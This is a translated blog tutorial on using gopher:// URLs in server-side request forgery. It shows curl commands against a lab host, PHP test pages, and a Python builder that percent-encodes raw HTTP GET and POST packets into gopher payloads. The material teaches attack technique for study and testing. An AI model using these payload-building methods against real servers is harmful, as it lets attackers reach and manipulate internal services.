Gopher protocol

This article is based on Margin's article.


What is the Gopher protocol?

Definition: Gopher is an early Internet information retrieval system. It organizes the documents on a server into menus (indexes) that let a user jump from one location on the Internet to another. Before the World Wide Web, Gopher was the most important retrieval tool on the Internet and Gopher sites were the most important sites; the protocol runs over TCP port 70. After the WWW appeared, Gopher lost its prominence. Today it is essentially obsolete and rarely used.

For SSRF, what matters is that a gopher URL carries raw bytes to deliver to a host and port: the gopher path after the host is sent to the target as a TCP data stream. A GET or POST request can therefore be captured first (for example with a proxy), then re-encoded into a URL that conforms to the gopher protocol, so that the vulnerable server ends up sending an attacker-built HTTP request. This is what makes gopher the most powerful scheme in SSRF exploitation: the target receives whatever TCP payload the attacker encoded, not just an HTTP GET.

Restrictions: whether gopher:// can be used depends on the client library behind the SSRF, not on the language as such. libcurl supports gopher when it is built with that protocol enabled, so the curl binary and PHP's curl extension usually work; PHP's file_get_contents() and Python's urllib do not speak gopher at all. To check a curl build, run `curl -V` and look for `gopher` in the Protocols line.

Gopher protocol format:

URL: gopher://<host>:<port>/_<TCP data stream>   (the `_` is a placeholder: the first character of the gopher path is the item type and is not sent)
  • The default port of gopher is 70
  • For a POST request, every carriage return and line feed must be written as %0d%0a. If the body has several parameters, the & between them must also be URL-encoded (%26); otherwise, when the gopher URL is itself passed as a parameter of the outer SSRF request, that request's parser splits the URL at the &.

Sending an HTTP GET request over gopher:

Start an nc listener on the Windows side:

[screenshot]

On Kali, use the gopher protocol to send a request to the Windows listener:

$ curl gopher://192.168.1.120:8989/qianxun

[screenshot]

The nc listener on Windows received the data immediately, but the first character was missing: `ianxun` arrived instead of `qianxun`.

$ curl gopher://192.168.1.120:8989/suibianxie

[screenshot]

Still the same: the first character is gone. The reason is that the first character after the slash in a gopher URL is the Gopher item-type selector; the client strips it and sends only what follows. So a placeholder character (any character will do) has to be put in front of the data you actually want delivered.

So how do we send an HTTP request, for example a GET? The idea is simply to send the original HTTP packet as the gopher data stream. Sending HTTP data over the gopher protocol takes three steps:

1. Construct the HTTP packet
2. URL-encode it, writing each carriage return and line feed as %0d%0a
3. Send it as a gopher:// URL

Prepare a PHP page (get.php):

<?php
	echo "Hello ,".$_GET["name"]."!";
?>

The corresponding GET packet is:

GET /ssrf/test/get.php?name=Qianxun HTTP/1.1
Host: 192.168.1.120

After URL encoding, with the placeholder in front, sent with curl:

curl gopher://192.168.1.120:80/_GET%20/ssrf/test/get.php%3fname=Qianxun%20HTTP/1.1%0d%0AHost:%20192.168.1.120%0d%0A

[screenshot]

General form: gopher://<host>:<port>/<placeholder><HTTP request, with every CRLF written as %0d%0A>

There are many pitfalls in the URL encoding:

1. The question mark (?) in the request path must be percent-encoded as %3f; otherwise the client may treat it as the start of the gopher URL's own query string instead of part of the data.
2. Line endings must be %0d%0a. If you let a tool encode the packet for you, it may emit only %0a.
3. The HTTP headers must be terminated by an empty line, so add %0d%0a after the last header line. That is how the server knows the message (or the header block of a POST) has ended; curl itself appends one more CRLF after the gopher selector, which is why the GET example above is accepted.


Sending an HTTP POST request over gopher:

The code of post.php is:

<?php
	echo "Hello ,".$_POST["name"]."!"."\n";
?>

Before sending a POST request, look at the format of a POST packet.

Note that a POST request needs four things: the request line, the Host header, Content-Type, and Content-Length, where Content-Length must equal the number of bytes in the body (here `name=Qianxun` is 12 bytes):

POST /ssrf/test/post.php HTTP/1.1
Host: 192.168.1.120
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

name=Qianxun

Then URL-encode the POST packet and turn it into a gopher URL:

curl gopher://192.168.1.120:80/_POST%20/ssrf/test/post.php%20HTTP/1.1%0d%0AHost:192.168.1.120%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:12%0d%0A%0d%0Aname=Qianxun%0d%0A

Note the placeholder character (`_`) right after the slash in the gopher URL, and that Content-Length (12) matches the body `name=Qianxun`; a smaller value makes the server truncate the body.

After sending the gopher POST request with curl, the result is:
[screenshot]
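To make the three-step procedure and the encoding pitfalls concrete for both the GET and the POST case, here is an added example (not code from the original post): a builder that turns a hand-made HTTP packet into a gopher URL, a model of what the client actually puts on the wire, and a simplified server-side parser to check the result offline. The host, port and paths (192.168.1.120:80, get.php, post.php) are the lab values from the post; the client model assumes curl's behaviour (drop the type character, append CRLF), and parse_http_request() is a toy model of an HTTP/1.1 server, not a real one.

```python
"""Build gopher:// URLs that carry raw HTTP requests, and check them offline.

Added example for this post; not code from the original article.
gopher_wire_bytes() models what curl does with a gopher URL (strip the type
character, append CRLF); parse_http_request() is a simplified HTTP/1.1 server
view, enough to show what the target will actually parse.
"""
from urllib.parse import quote, unquote_to_bytes, urlencode

# Characters left unencoded inside the gopher path. Everything else (space,
# ?, &, CR, LF, #, %) is percent-encoded so that neither the gopher client nor
# the parser of an outer SSRF parameter can misinterpret it.
SAFE = "/:=-_.~"


def http_request(method, path, host, body=b""):
    """Step 1: assemble an HTTP/1.1 packet with CRLF line endings.

    For a POST the four required pieces are the request line, Host,
    Content-Type and a Content-Length equal to the body's byte count.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    if method == "POST":
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append(f"Content-Length: {len(body)}")
    # The empty line (CRLF CRLF) tells the server the header block is over.
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def build_gopher_url(host, port, raw_request, placeholder="_"):
    """Steps 2 and 3: percent-encode the packet and wrap it in a gopher URL.

    The first byte after the slash is the gopher item-type selector, which
    the client strips, so a throwaway placeholder goes in front of the data.
    """
    return f"gopher://{host}:{port}/{placeholder}{quote(raw_request, safe=SAFE)}"


def gopher_wire_bytes(url):
    """Client model (curl): decode the path, drop the type character, and
    append the CRLF that curl sends after every gopher selector."""
    _, rest = url.split("://", 1)
    _, path = rest.split("/", 1)
    return unquote_to_bytes(path)[1:] + b"\r\n"


def parse_http_request(wire):
    """Simplified server-side view: split head and body, reading exactly
    Content-Length body bytes. Anything beyond that is 'leftover' (for
    example the CRLF the gopher client appended), which a real server would
    treat as the start of a next request."""
    head, _, rest = wire.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.decode().split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().decode().lower()] = value.strip().decode()
    length = int(headers.get("content-length", "0"))
    return {"method": method, "target": target, "headers": headers,
            "body": rest[:length], "leftover": rest[length:]}


HOST, PORT = "192.168.1.120", 80   # lab host from the post


def demo_get():
    """GET /ssrf/test/get.php?name=Qianxun as a gopher URL (? becomes %3F)."""
    req = http_request("GET", "/ssrf/test/get.php?name=Qianxun", HOST)
    return build_gopher_url(HOST, PORT, req)


def demo_post(form):
    """POST form fields to post.php; the & between fields becomes %26."""
    body = urlencode(form).encode()          # form-encoded body, e.g. name=...&lang=...
    req = http_request("POST", "/ssrf/test/post.php", HOST, body)
    return build_gopher_url(HOST, PORT, req)


if __name__ == "__main__":
    for url in (demo_get(), demo_post({"name": "Qianxun", "lang": "en"})):
        print(url)
        print(parse_http_request(gopher_wire_bytes(url)))
```

The two-layer encoding is the point to notice: urlencode() produces the HTTP body (`name=Qianxun&lang=en`), and quote() then re-encodes that body's `&` and every space, `?`, CR and LF for the gopher layer, so the bytes the target parses are exactly the original packet plus the trailing CRLF added by the client.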

Origin: blog.csdn.net/qq_43665434/article/details/115255263